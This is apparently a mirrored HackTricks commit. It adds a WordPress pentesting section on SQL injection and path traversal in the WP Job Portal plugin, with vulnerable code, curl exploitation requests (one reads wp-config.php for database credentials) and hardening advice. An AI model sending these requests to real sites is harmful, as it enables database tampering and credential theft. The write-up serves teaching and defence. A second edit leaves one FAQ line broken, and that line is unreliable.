maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Add content from: Multiple Critical Vulnerabilities Patched in WP Job Portal P...

Browse Source
This commit is contained in:
HackTricks News Bot 2025-08-12 18:31:03 +00:00
parent 30fa8082d2
commit 3ccc2ea6f2
2 changed files with 79 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

78
src/network-services-pentesting/pentesting-web/wordpress.md
View File

@ -518,8 +518,86 @@ Also, **only install trustable WordPress plugins and themes**.
- **Limit login attempts** to prevent Brute Force attacks
- Rename **`wp-admin.php`** file and only allow access internally or from certain IP addresses.
### Unauthenticated SQL Injection via insufficient validation (WP Job Portal <= 2.3.2)
The WP Job Portal recruitment plugin exposed a **savecategory** task that ultimately executes the following vulnerable code inside `modules/category/model.php::validateFormData()`:
```php
$category = WPJOBPORTALrequest::getVar('parentid');
$inquery = ' ';
if ($category) {
$inquery .= " WHERE parentid = $category "; // <-- direct concat
}
$query = "SELECT max(ordering)+1 AS maxordering FROM "
. wpjobportal::$_db->prefix . "wj_portal_categories " . $inquery; // executed later
```
Issues introduced by this snippet:
1. **Unsanitised user input** `parentid` comes straight from the HTTP request.
2. **String concatenation inside the WHERE clause** no `is_numeric()` / `esc_sql()` / prepared statement.
3. **Unauthenticated reachability** although the action is executed through `admin-post.php`, the only check in place is a **CSRF nonce** (`wp_verify_nonce()`), which any visitor can retrieve from a public page embedding the shortcode `[wpjobportal_my_resumes]`.
#### Exploitation
1. Grab a fresh nonce:
```bash
curl -s https://victim.com/my-resumes/ | grep -oE 'name="_wpnonce" value="[a-f0-9]+' | cut -d'"' -f4
```
2. Inject arbitrary SQL by abusing `parentid`:
```bash
curl -X POST https://victim.com/wp-admin/admin-post.php \
-d 'task=savecategory' \
-d '_wpnonce=<nonce>' \
-d 'parentid=0 OR 1=1-- -' \
-d 'cat_title=pwn' -d 'id='
```
The response discloses the result of the injected query or alters the database, proving SQLi.
#### Hardening checklist
* Enforce **type validation** (`is_numeric()` for integers).
* Escape with **`esc_sql()`** or, even better, use **`$wpdb->prepare()`**.
* Treat *nonce-only* endpoints as **privileged** add `current_user_can()` / `is_user_logged_in()` where appropriate.
---
### Unauthenticated Arbitrary File Download / Path Traversal (WP Job Portal <= 2.3.2)
Another task, **downloadcustomfile**, allowed visitors to download **any file on disk** via path traversal. The vulnerable sink is located in `modules/customfield/model.php::downloadCustomUploadedFile()`:
```php
$file = $path . '/' . $file_name;
...
echo $wp_filesystem->get_contents($file); // raw file output
```
`$file_name` is attacker-controlled and concatenated **without sanitisation**. Again, the only gate is a **CSRF nonce** that can be fetched from the resume page.
#### Exploitation
```bash
curl -G https://victim.com/wp-admin/admin-post.php \
--data-urlencode 'task=downloadcustomfile' \
--data-urlencode '_wpnonce=<nonce>' \
--data-urlencode 'upload_for=resume' \
--data-urlencode 'entity_id=1' \
--data-urlencode 'file_name=../../../wp-config.php'
```
The server responds with the contents of `wp-config.php`, leaking DB credentials and auth keys.
#### Hardening checklist
* Sanitize filenames with helpers such as `sanitize_file_name()` or a custom `wpJP_clean_file_path()` that strips `../` & `./`.
* Make sure the **resolved path stays inside** the intended upload directory (`realpath()` + prefix check).
* Restrict the action to **authenticated roles** and validate the nonce.
---
## References
- [Unauthenticated Arbitrary File Deletion Vulnerability in Litho Theme](https://patchstack.com/articles/unauthenticated-arbitrary-file-delete-vulnerability-in-litho-the/)
- [Multiple Critical Vulnerabilities Patched in WP Job Portal Plugin](https://patchstack.com/articles/multiple-critical-vulnerabilities-patched-in-wp-job-portal-plugin/)
{{#include ../../banners/hacktricks-training.md}}

3
src/welcome/hacktricks-values-and-faq.md
View File

@ -48,7 +48,7 @@ Yes, you can, but **don't forget to mention the specific link(s)** where the con
> [!TIP]
>
> - **How can I cite a page of HackTricks?**
> - **How can I a page of HackTricks?**
As long as the link **of** the page(s) where you took the information from appears it's enough.\
If you need a bibtex you can use something like:
@ -144,4 +144,3 @@ This license does not grant any trademark or branding rights in relation to the
{{#include ../banners/hacktricks-training.md}}